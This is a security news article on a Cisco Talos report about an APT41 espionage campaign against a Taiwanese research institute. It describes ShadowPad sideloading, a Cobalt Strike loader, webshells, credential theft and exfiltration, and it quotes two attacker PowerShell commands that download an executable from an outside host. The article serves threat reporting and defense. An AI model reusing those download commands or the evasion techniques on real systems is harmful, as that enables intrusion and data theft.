Cisco Talos has unearthed a sophisticated cyber-espionage campaign targeting a Taiwanese government-affiliated research institute.
The attack, attributed to the notorious Chinese hacking group APT41, involved the deployment of the ShadowPad malware and Cobalt Strike, among other customized tools.
This article delves into the specifics of the attack, the methodologies employed by the hackers, and the implications for cybersecurity.
The Attack Unveiled
Initial Compromise
The malicious campaign began as early as July 2023 and was first detected in August 2023 when Cisco Talos identified abnormal PowerShell commands connecting to an IP address to download and execute scripts.
The victim, a research institute specializing in computing and associated technologies, became a prime target due to the sensitive nature of its work.
Tactics, Techniques, and Procedures (TTPs)
The attack leveraged a combination of malware, open-source tools, and sophisticated procedures.
The ShadowPad malware, used in this campaign, exploited an outdated version of Microsoft Office IME binary as a loader to launch the payload.
A tailored loader was also created to inject a proof-of-concept for CVE-2018-0824, utilizing a remote code execution vulnerability for local privilege escalation.
Attribution to APT41
Evidence and Assessment
Cisco Talos assesses with medium confidence that the campaign was orchestrated by APT41, a group alleged by the U.S. government to consist of Chinese nationals.
How to Build a Security Framework With Limited Resources IT Security Team (PDF) - Free Guide
This assessment is based on overlaps in TTPs, infrastructure, and malware families used exclusively by Chinese APT groups.
ShadowPad, a modular remote access trojan (RAT) used in this attack, is widely considered the successor of PlugX and is known to be sold to Chinese hacking groups, including APT41.
Historical Context
APT41, believed to be based out of Chengdu, China, has a history of targeting entities of strategic interest. The group’s activities have been reported in various campaigns, including those attributed to other Chinese hacking groups like Mustang Panda and the Tonto Team.
The current campaign exhibited similarities with previous attacks, such as using identical loading mechanisms, infection chains, and file names.
Technical Analysis
Malware Deployment
Upon gaining access to the network, the attackers established a foothold by executing malicious code and binaries. They installed a webshell on the machine with the web server, enabling further discovery and execution.
The attackers deployed ShadowPad and Cobalt Strike using three different approaches: webshell, RDP access, and reverse shell.
PowerShell Commands
The attackers initially used PowerShell commands to download and execute additional scripts.
powershell (new-object System.Net.WebClient).DownloadFile('https://www.nss.com[.]tw/calc.exe','C:/users/public/calc.exe');"
powershell (new-object System.Net.WebClient).DownloadFile('https://www.nss.com[.]tw/calc.exe','C:/users/public/calc2.exe'); "
Despite detection and interruption, they persisted by using other PowerShell commands to download Cobalt Strike malware from a compromised C2 server.
The Cobalt Strike loader, written in GoLang, was designed to evade detection by Windows Defender.
Information Gathering and Exfiltration
Credential Harvesting
The threat actors harvested passwords from the compromised environment using tools like Mimikatz and WebBrowserPassView. They executed several commands to obtain information on user accounts, directory structure, and network configurations.
Additionally, ShadowPad performed lightweight network scanning to discover other machines in the compromised network.
Data Exfiltration
To exfiltrate many files, the attackers used 7zip to compress and encrypt the files into an archive. They then used backdoors to send the archive to the command and control (C2) server.
ShadowPad Loader
The investigation revealed two distinct iterations of the ShadowPad loader, utilizing the same sideloading technique but exploiting different vulnerable binaries.
The initial variant targeted an outdated Microsoft Office IME binary version, while the more recent variant used a different legitimate binary to launch the malware.
Cobalt Strike Loader
A unique Cobalt Strike loader, developed in GoLang, was also detected. It was designed to avoid antivirus detection.
The loader was hidden in a picture using steganography, and its download, decryption, and execution routines occurred in runtime memory.
The APT41 attack on the Taiwanese research institute underscores the persistent and evolving threat posed by state-sponsored hacking groups.
Advanced malware like ShadowPad and Cobalt Strike, combined with sophisticated TTPs, highlights the need for robust cybersecurity measures.
As cyber-espionage campaigns target critical research and development entities, organizations must remain vigilant and proactive in their defense strategies.
Are you from SOC and DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Free Access